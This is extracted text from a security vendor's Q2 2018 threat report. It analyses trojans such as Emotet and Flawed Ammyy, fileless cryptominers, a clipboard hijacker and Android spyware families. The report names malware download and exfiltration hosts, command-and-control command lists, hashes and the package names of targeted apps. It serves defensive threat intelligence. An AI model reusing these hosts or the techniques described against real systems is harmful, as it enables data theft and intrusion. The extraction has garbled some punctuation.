124 Geopolitical intelligence Cyberattacks and malware spikes are often correlated with significant events in world politics Assignments of the US Secretary of State and CIA Director Armeniarsquos political revolution the Donald Trump and Vladimir Putin summit in Helsinki the Champions League final in Ukraine US - South Korean joint military exercises the anniversary of the 1989 Tiananmen Square protests and other events during Q2-2018 clearly demonstrate the existence of such correlations
Global Threat Report Q2 2018 Edition
Page 4 of 73
2 Trojans going on the offensive to hunt for confidential data The second quarter of 2018 brought a sudden change in malware competition Trojans squeezed out other malware types and jumped to the top of the charts Gaining the lionrsquos share of the malware marketplace they can radically influent on the cybersecurity landscape Their appearance makes cybersecurity departments and individual users update on their defense tactics
Malware Distribution by Type
Why are these changes inevitable
Trojans are a special kind of malware Their distinguishing feature is universality They are most effective at providing a diversity of attacks stealing data implanting ransomware adware cryptominers or even completely crashing systems
Another special feature of trojans is covert activity An owner of a trojan-infected machine can remain unaware of the attack for a long time during which the trojan is an active malefactor
Hence the need for a new approach to the defense tactic appears Letrsquos have a closer look at the most active vicious players of the trojans team to deeply understand what harm they can do to your computers if sneak inside
Global Threat Report Q2 2018 Edition
Page 5 of 73
Distribution of top 30 Malware Families
In this list of 30 top malware families where trojans overwhelmingly dominate you can find samples of this malware exhibiting diverse types of malicious activity
For example the leader of the attacks in Q2 TrojWareWin32Agent is a trojan family that clandestinely penetrates usersrsquo computers and then downloads other malware from a cybercriminal server And the downloaded malware can be of any type
Number two in the list TrojWareJSClickjack exhibits different activity it makes users unintentionally click on hidden links The link can be just another advertisement or lead to a malicious website to infect users with other types of malware
TrojWareJSFaceliker just clicks posts in Facebook on behalf of the user to promote fake or fraudulent pages The malware infects then usersrsquo browsers when they visit malicious or compromised websites Then when infected users open Facebook Faceliker hijacks their ldquolikesrdquo
TrojWareWin32Kryptik steals information from computers and sends it to the cybercriminal Command-and-Control server
Global Threat Report Q2 2018 Edition
Page 6 of 73
TrojWareWin32Injector uses process injection as the main technique to take malicious actions Its mostly used to bypass security products
TrojWareJSDownloader consists of scripts that download and execute malware from the Internet Itrsquos usually spread via a phishing email
Such diversity of malicious activity of trojans and their special ability to hide have always made them one of the hardest malware to fight But in Q2-2018 they become even more sophisticated and dangerous Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community
First among the trends is an explosive mixture of trojans and phishing emails Earlier phishing emails mostly contained a link to a malicious website to lure victims to supply their credentials But today phishing emails have become a potent means of delivery for trojans and other malware These trojans steal credentials and private information by ferreting out infected machines in search of valuable data and then send it to cybercriminalsrsquo servers
The accompanying graph of the most popular malware spread via email Note that 18 of 20 are trojans
Distribution of Phishing Families of Malware
Global Threat Report Q2 2018 Edition
Page 7 of 73
21 The Most Widespread Trojan The most proliferated trojan TrojWareWin32Injector is designed to steal credentials from infected computers It was spread via fake email imitating a message from a shipping and trading company As seen in the screenshot the malware attached is carefully disguised with a plausible name and icon to look like a real scanned document
If a user takes the bait and runs the file it copies itself to appdata as D5E2DEE36C7Aexe then launches itself from that location and starts to gather credentials present in the system
It collects credentials and private data from known browsers email clients FTP clients WebDav SCP clients Then it sends all the collected data to the attackersrsquo server httpcallbedmlpackfarefrephp
The phishing email
Global Threat Report Q2 2018 Edition
Page 8 of 73
22 PowerShell-based attack with Emotet Another alarming trend is related to malware itself rather than its delivery method Often cybercriminals use malware based not on Windows native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer This type of attack is much harder to detect with antivirus tools
Emotet is one of the most aggressive trojans currently acting in cyberspace Spread by various infection vectors and backed by a huge network of compromised hosts it heavily affects many individuals and companies
The following attack started with the email that imitated a message from IRS about ldquoTax Account Transcriptrdquo Notice the message is written in a cheerful manner to inspire user trust
The phishing email
Global Threat Report Q2 2018 Edition
Page 9 of 73
The attached file is an Office document containing a VBScript As the settings of the newly installed Microsoft Office do not allow execution of such scripts by default the attackers added a special option to convince the victims to turn on VBScript execution
The special option to convince the victims to turn on VBScript execution
Global Threat Report Q2 2018 Edition
Page 10 of 73
The purpose of the VBScript is to launch PowerShell
Global Threat Report Q2 2018 Edition
Page 11 of 73
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)
The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence
The malware creates ldquolanesviewerrdquo service to ensure persistence
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
